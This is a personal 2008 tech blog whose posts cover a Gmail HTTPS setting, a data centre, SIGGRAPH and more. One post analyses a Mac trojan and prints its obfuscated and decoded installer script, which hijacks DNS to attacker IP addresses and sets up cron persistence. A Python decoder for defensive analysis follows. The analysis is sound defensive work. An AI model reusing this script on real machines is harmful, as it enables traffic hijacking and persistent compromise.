Gentlemen, I have had men watching you for a long time and I am convinced that you have used the funds of the bank to speculate in the breadstuffs of the country.

When you won, you divided the profits amongst you, and when you lost, you charged it to the bank.

You tell me that if I take the deposits from the bank and annul its charter, I shall ruin ten thousand families. That may be true, gentlemen, but that is your sin! Should I let you go on, you will ruin fifty thousand families, and that would be my sin!

You are a den of vipers and thieves.

-- Andrew Jackson (7th US President, when forcing the closure of the Second Bank of the US in 1836 by revoking its charter)

Posted Thu 16 Oct 2008 10:54:22 PM EDT Tags: 1836

After reading about the new Gmail hacking tool I thought I'd take advantage of the new Gmail setting which allows your traffic to always be sent over encrypted SSL connections.

I spent a good long time hunting through Gmail's settings trying to find the mysterious "Always use https" setting. Eventually I figured out that the issue is that this new setting hasn't yet made it to Google Apps.

I don't see this advertised anywhere, and I hope I'm just missing something. However, logging into my standard Gmail account I see the setting exactly where it should be.

I've informed Google and hopefully it's coming soon. In the meantime ... suck.

Posted Sat 06 Sep 2008 01:34:15 AM EDT Tags:

Computer World has a nice (but short!) write-up on our new data centre. It's kept us busy for a long time; it's nice to see people interested in what we've done.

Weta Digital, the studio that produced the Lord of the Rings series and King Kong, has completed its new extreme density data centre.

Weta says the space and energy efficient facility is unlike any other worldwide, balancing floor space, power, cooling and other technologies to deliver maximum frame rendering power.

The facility is also claiming another world first: the first to use Hewlett-Packard's Double Density server blades, which combine two independent servers in one blade.

"The increased density of the blades allows us to add a significantly higher number of processors in a confined physical footprint while still managing within tight power consumption and cooling requirements," says acting CEO Adam Shand.

The facility uses water cooled racks made by Rittal, which allow cooling to be delivered to racks as needed in real-time. Cooling is self-regulated and can be managed at a granular level for each rack, Shand says.

Source: http://computerworld.co.nz/news.nsf/tech/FC20EE172043775FCC2574BB00113609

UPDATE: DOH. Thanks to John and Tim for pointing out the typo, I am in fact acting CTO ... not CEO. <sigh>

Posted Fri 05 Sep 2008 01:35:05 AM EDT Tags: self

Posted Wed 03 Sep 2008 07:20:06 AM EDT Tags: lyrics

The latest xkcd makes a reference to Harrison Ford and ESB1 which I failed to grasp. In an effort to comprehend I asked Google and was directed to this site. Following my nose led me here which in turn directed me to a fake YouTube site.

When I clicked on the fake YouTube widget to view the video as prompted, I noticed Finder mount a DMG image in the background and Installer try to install something. I've become so relaxed about security on my Mac that it took a second for me to even realise that something bad was in the process of happening. Fortunately, before I had time to react, the Installer application crashed.

This means that Safari automatically downloaded and mounted a DMG from an unknown and untrusted web site, and then ran the included installer package without asking for permission. This is not cool. Fortunately, protecting yourself from this is pretty straightforward:

  1. In "Safari - Preferences - General" make sure that "Open safe files after downloading" is not ticked.
  2. In "System Preferences - Accounts - <your account name>" make sure that "Allow user to administer this computer" is not ticked.

The first means that after downloading a file Safari will never automatically run it. This is a minor inconvenience, but it means that nothing can be run without your explicit request (e.g. double clicking the file).

The second means that if something does get run, the program won't have permissions to do anything which requires admin privileges. This won't stop it from deleting all your personal data, but it will stop it from messing with any system settings.

I've put a copy of the DMG up on my website in case anybody wants to download it and have a look. For those that are curious about what I found when I started to poke around, keep reading.

These lines were generated in "/var/log/system.log":

Aug 30 21:54:14 overkill kernel[0]: Safari[303] Unable to clear quarantine `install.pkg': 30
Aug 30 21:54:17 overkill Installer[16295]: An uncaught exception was raised
Aug 30 21:54:17 overkill Installer[16295]: *** -[NSCFArray removeObjectAtIndex:]: index (1) beyond bounds (1)
Aug 30 21:54:17 overkill Installer[16295]: *** Terminating app due to uncaught exception 'NSRangeException', reason: '*** -[NSCFArray removeObjectAtIndex:]: index (1) beyond bounds (1)'
Aug 30 21:54:17 overkill Installer[16295]: Stack: (\n    2444165451,\n    2518110459,\n    2444164907,\n    2444164970,\n    2496036639,\n    2495531216,\n    2495657399,\n    2417387518,\n    2417386423,\n    273528,\n    158730,\n    2495524637,\n    2495523524,\n    2481334005,\n    2481333682\n)
Aug 30 21:54:35 overkill ReportCrash[16298]: Formulating crash report for process Installer[16295]
Aug 30 21:54:36 overkill com.apple.launchd[100] ([0x0-0x213213].com.apple.installer[16295]): Exited abnormally: Trace/BPT trap
Aug 30 21:54:43 overkill ReportCrash[16298]: Saved crashreport to /Users/adam/Library/Logs/CrashReporter/Installer_2008-08-30-215417_overkill.crash using uid: xxxx gid: yyyy, euid: xxxx egid: yyyy
Aug 30 21:55:10 overkill /usr/sbin/ocspd[16314]: starting
Aug 30 21:55:11 overkill SubmitReport[16311]: Submitted compressed crash report for Installer

In my "~/Downloads/" directory I had a file called "1023.dmg", the file metadata tells me that it was downloaded from "http://64.28.190.22/download/1023.dmg, http://immenseclips.com/m6/movie1.php?id=1658&n=teen".

The DMG mounted itself at "/Volumes/153" and contained a single package called "install.pkg" with these contents:

overkill(adam)$ find /Volumes/153/install.pkg -ls
19   0 drwxr-xr-x    3 adam    user    102 Mar 12 00:37 /Volumes/153/install.pkg
20   0 drwxr-xr-x    7 adam    user    238 Mar 12 00:37 /Volumes/153/install.pkg/Contents
21  72 -r--r--r--    1 adam    user  35866 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Archive.bom
22   8 -r--r--r--    1 adam    user   3027 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Archive.pax.gz
23   8 -r--r--r--    1 adam    user   1326 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Info.plist
24   8 -r--r--r--    1 adam    user      8 Mar 12 00:37 /Volumes/153/install.pkg/Contents/PkgInfo
25   0 drwxr-xr-x   12 adam    user    408 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources
26   8 lrwxr-xr-x    1 adam    user     14 Mar 12 23:36 /Volumes/153/install.pkg/Contents/Resources/153.bom -> ../Archive.bom
27   8 lrwxr-xr-x    1 adam    user     17 Mar 12 23:36 /Volumes/153/install.pkg/Contents/Resources/153.pax.gz -> ../Archive.pax.gz
28   8 -r--r--r--    1 adam    user     45 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/153.sizes
29   8 -r--r--r--    1 adam    user    554 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/BundleVersions.plist
30   0 drwxr-xr-x    5 adam    user    170 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj
31   8 -r--r--r--    1 adam    user    312 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/153.info
32   8 -rw-r--r--    1 adam    user    342 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/Description.plist
33  16 -rwxr-xr-x    1 adam    user   8027 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/License.txt
34   8 -r--r--r--    1 adam    user     17 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/package_version
35   8 -rwxr-xr-x    1 adam    user     98 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/postinstall
36   8 -rwxr-xr-x    1 adam    user     98 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/postupgrade
37   8 -rwxr-xr-x    1 adam    user    762 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/preinstall
38   8 -rwxr-xr-x    1 adam    user    762 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/preupgrade

The "Archive.bom" claims that it will install these files (none of which actually exist as far as I can tell):

overkill(adam)$ lsbom Archive.bom 
.       40777   501/501
./Mozillaplug.plugin    40775   0/80
./Mozillaplug.plugin/Contents   40775   0/80
./Mozillaplug.plugin/Contents/Info.plist        100664  0/80    930     1525506808
./Mozillaplug.plugin/Contents/MacOS     40775   0/80
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin      100775  0/80    24584   1275209212
./Mozillaplug.plugin/Contents/Resources 40775   0/80
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc     100644  0/80    381     3665281426
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE        100664  0/80    381     2963929028
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak 100644  0/80    338     3415230991
./Mozillaplug.plugin/Contents/version.plist     100664  0/80    471     2911002047
./QuickTime.xpt 100755  0/501   762     3209000961
./plugins.settings      100755  0/501   659     869060121
./sendreq       100644  0/501   1214    2574454577

It all looked pretty boring until I found references to "Porn4Mac" in the "Info.plist" and "Description.plist" files:

<key>IFPkgDescriptionDescription</key>
<string>Its a suppa puppa desc yo</string>
<key>IFPkgDescriptionTitle</key>
<string>Porn4Mac</string>

and discovered that the "pre{install,upgrade}" files were "encrypted":

overkill(adam)$ cat preinstall
#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aax.zr;s2=cx.zxx.aaz.ea;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2 
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -i|tjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
        klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
        ljnfxab ljnf.pfox
        jh -jr ljnf.pfox
rp
jh -jr "$0"

That's suspicious, so now I'm curious and want to know what it's doing :-)

Basically it decrypts the script to a file called "1" and then executes and passes the IP addresses "85.255.115.29" and "85.255.112.61" through as the variables $1 and $2.

The script itself tries to use scutil to set your DNS servers to the passed IP addresses. It then tries to create a cronjob to run a file called "/Library/Internet\ Plug-Ins/Quicktime.xpt" every minute. I think it means to copy itself to Quicktime.xpt but I can't actually find where it does that.

overkill(adam)$ s1=cx.zxx.aax.zr; s2=cx.zxx.aaz.ea; echo $s1 | tr qazwsxedcr 0123456789; echo $s2 | tr qazwsxedcr 0123456789 
85.255.115.29
85.255.112.61

overkill(adam)$ x=`cat preinstall | wc -l | awk '{print $1}'`; x=`expr $x - 2`; tail -$x "preinstall" | tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv
#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2 
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -l|grep QuickTime.xpt`
if [ "$exist" == "" ]; then
        echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
        crontab cron.inst
        rm -rf cron.inst
fi
rm -rf "$0"
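An added example (not code from the original post): a small Python analysis helper that reproduces the two tr(1) decodings shown above by reading the substitution alphabets and the s1/s2 values out of the dropper's own header line, then pulls the DNS servers and the cron persistence entry out of the recovered script. The embedded sample is the header line plus five of the obfuscated lines copied from the preinstall script quoted earlier, not the whole file.

```python
import re

# Constructed sample: the dropper's header line plus five of its obfuscated
# body lines, copied from the preinstall script quoted above (not the whole file).
SAMPLE = r"""#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aax.zr;s2=cx.zxx.aaz.ea;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
q.aqq SkjskjAqqjkooko * $1 $2
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
"""


def decode_dropper(text):
    """Undo both tr(1) substitutions the header sets up and return the
    plaintext body plus the two IP arguments it passes to the decoded script."""
    lines = text.splitlines()
    # The header is the line that pipes the script's own tail through tr into "1".
    hdr = next(i for i, l in enumerate(lines) if re.search(r"\|tr [a-z]+ [a-z]+>1", l))
    header = lines[hdr]
    src, dst = re.search(r"\|tr ([a-z]+) ([a-z]+)>1", header).groups()
    body_map = str.maketrans(src, dst)          # letter-for-letter cipher of the body
    dsrc, ddst = re.search(r"tr\s+([a-z]+)\s+(\d+)", header).groups()
    ip_map = str.maketrans(dsrc, ddst)          # letters-to-digits cipher of s1/s2
    s1, s2 = re.search(r"s1=([^;]+);s2=([^;]+);", header).groups()
    body = "\n".join(l.translate(body_map) for l in lines[hdr + 1:])
    return {"ips": [s1.translate(ip_map), s2.translate(ip_map)], "body": body}


def extract_indicators(decoded):
    """Pull out what a defender wants from the plaintext: the DNS servers pushed
    via scutil and the cron entry used for persistence ($1/$2 are resolved)."""
    body, ips = decoded["body"], decoded["ips"]
    out = {"dns_servers": [], "cron_schedule": None, "cron_target": None}
    dns = re.search(r"d\.add ServerAddresses \* (.+)", body)
    if dns:
        out["dns_servers"] = [ips[int(a[1:]) - 1] if a.startswith("$") else a
                              for a in dns.group(1).split()]
    path = re.search(r'^path="([^"]+)"', body, re.M)
    cron = re.search(r'((?:\* ){4}\*) \\"([^"\\]+)\\"', body)
    if cron:
        out["cron_schedule"] = cron.group(1)
        target = cron.group(2)
        out["cron_target"] = target.replace("$path", path.group(1)) if path else target
    return out


if __name__ == "__main__":
    found = extract_indicators(decode_dropper(SAMPLE))
    print("rogue DNS servers:", found["dns_servers"])
    print("persistence:", found["cron_schedule"], found["cron_target"])
```

Because the alphabets are parsed from the header rather than hard-coded, the same helper decodes a variant that swaps in a different tr mapping or different s1/s2 values.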

So that's that. It totally failed to work on my Mac, but that's mostly luck; I strongly recommend that everybody out there take the precautions I mention above to stop a future attack from being successful.

I do have a couple unanswered questions (it's late so possibly it'll be obvious in the morning):

  • I understand why the DMG got automatically mounted, but why did Installer automatically run the installer program?
  • Where is Quicktime.xpt supposed to come from? Other than the cronjob which is supposed to run it, I can't see any mention of it or anywhere that it gets created/copied?
  • I don't show it above but the postinstall script references a file called "sendreq", again I can't figure out what is supposed to create it?
  • What does it mean that the DMG shows as being downloaded from two different sites? I've never seen that before ...

An unexpected, but interesting, distraction for the night!

UPDATE: Apparently this is old news and has been thoroughly discussed elsewhere. It does appear that the version I found is slightly different from the ones being discussed online, but it's very similar.

  1. Yes I realise that I lose nearly infinite nerd points for not instantaneously realising that ESB stands for "Empire Strikes Back".
Posted Sat 30 Aug 2008 08:32:52 AM EDT Tags:

The below article in the Los Angeles Times is about a man who decided he wanted to install a urinal at home.

I spent the next few weeks asking women, many of whom I barely knew, what they thought about urinals. The results were not good. First of all, it's got an unfortunate name. Toilets would still be kept outside if they were called crapinals. Also, my female friends said urinals conjured images of large, impersonal institutions such as prisons. They felt like the lidlessness was unsanitary. Basically, what I learned is that women have vastly overestimated the precision of peeing into a toilet bowl while standing up.

When I countered with the clear advantages of the urinal -- toilet seat always down, decreased water use, saved time, ease of cleaning, the option to pour in ice and play the most fun game in the entire world -- the truth came out. Urinals, these women eventually conceded, are simply too aggressively male. It is, they explained, like hanging a codpiece over the mantle. Which, of course, is now my new lifetime dream.

This seemed grossly unfair because there is so much woman stuff in a house. Such as, for instance, the house.

His adventures amused me enough that I called Teresa to see what she thought of the idea. Once she got over the initial confusion of why I was bothering her at work, she responded "Can't you just pee in the sink?". Which was even funnier, so I created a poll on the work intranet which looked like this:

  • I'm a man, great idea! (36%)
  • I'm a man, awful idea! (18%)
  • I'm a woman, great idea! (5%)
  • I'm a woman, awful idea! (8%)
  • Can't you just pee in the sink? (31%)


If you still want more information, there's an Ask MetaFilter thread to satisfy any remaining craving for details.

Posted Fri 29 Aug 2008 07:33:33 PM EDT Tags:

Since I was already in Los Angeles for work I got to spend this week at SIGGRAPH. There were lots of amazing things, much of it way too domain specific to be comprehensible by me. Though utterly non-work related my favourite parts were the new technology and slow art exhibitions:

"The Dreaming Pillow" by Armella Leung and Olivier Oswald completely blew my mind; I think I spent well over 30 minutes playing with it and talking to Armella. It was simple, different and deeply beautiful. I loved navigating the dream sequences, but the most surprising part was watching people's visceral reactions to the ghost hands moving "underneath" the pillow. It's hard to describe in a way that feels meaningful; the best I can do is point you at a YouTube video.

The "reAcoustic eGuitar" by Amit Zoran is a fresh take on the acoustic guitar. Each string gets its own chamber to make a unique sound. If you want to change the sound of the guitar you build a CAD model of an appropriately shaped chamber and then print it using a 3D printer. Even cooler, though, was his next model (the bottom half in the picture): it does away with the physical chambers and instead allows you to manipulate the sound by programming a DSP. Acknowledging that the materials used in construction have an importance to the produced sound, he has also built resonating boards from different woods to allow the musician to quickly change the sound of the instrument mid-performance.

On a more mundane (and work related) note there were some other interesting things:

  • Nvidia has come out with a new product called the Quadro Plex S4, four FX5600's in a 1U rack mount.
  • ATI has rebranded their high end graphics cards as "FirePro" and they have massively improved their Linux support. Interestingly they are claiming better performance (for less money) than Nvidia. It'll be interesting to see how that pans out.
  • Shapeways is a new(?) Netherlands based competitor to New Zealand's Ponoko.
  • DepthQ is making a sub-US$6000 projector which will do stereo projection at 1280x720 and 120Hz. It weighs less than 7 lbs and is quiet enough to be used in a dailies room.
  • Rhino has finally come out with a license server which will cross layer three boundaries. Woo for being able to run your software on a different subnet than the license server; boo for using a bespoke license server.
  • Contour Design has an ergonomic mouse which has four buttons, a scroll wheel, a thumb rest and most importantly comes left and right handed and in multiple sizes.
  • Noren makes noise reduction and heat removal cabinets. They have a range of standard cabinets as well as being able to custom make cabinets to your requirements. Might be useful for projectors in rooms without projection booths (they say they've made cabinets for Barco projectors before).
  • I was interested to see the massive amount of products for motion tracking and motion capture. The inertial based systems don't yet have great resolution but the ultrasonic based tracking systems were pretty cool. The virtual camera that Intersense was showing off was pretty impressive.
  • Despite their awful name and crap web site DigiComp makes some pretty sweet looking portable RAID 0/1/5 enclosures. No idea on prices or support but I should remember to investigate next time we need to deliver mass data.
Posted Sat 16 Aug 2008 01:58:10 AM EDT Tags: event tech